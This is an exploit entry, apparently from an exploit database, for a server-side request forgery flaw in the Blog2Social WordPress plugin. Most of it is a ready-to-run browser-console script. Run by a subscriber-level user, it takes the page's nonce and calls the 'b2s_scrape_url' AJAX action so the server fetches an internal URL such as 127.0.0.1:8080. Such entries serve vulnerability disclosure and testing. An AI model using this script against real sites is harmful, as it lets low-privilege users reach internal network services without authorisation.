Share
## https://sploitus.com/exploit?id=WPEX-ID:EE312F22-CA58-451D-A1CB-3F78A6E5ECAF
Run this script in the web browser console while being logged in as a subscriber and on the Blog2Social Dashboard page (wp-admin/admin.php?page=blog2social)

// Set this callback_url to the internal url you want the server to call
callback_url = 'http://127.0.0.1:8080/';
wp_site_ajax_url = 'https://example.com/wp-admin/admin-ajax.php';

// Don't edit below
data = new FormData();
data.append('action', 'b2s_scrape_url');
data.append('url', callback_url);
data.append('b2s_security_nonce', jQuery('#b2s_security_nonce').val());

fetch(wp_site_ajax_url, {
    method: 'POST',
    credentials: 'same-origin',
    body: data
});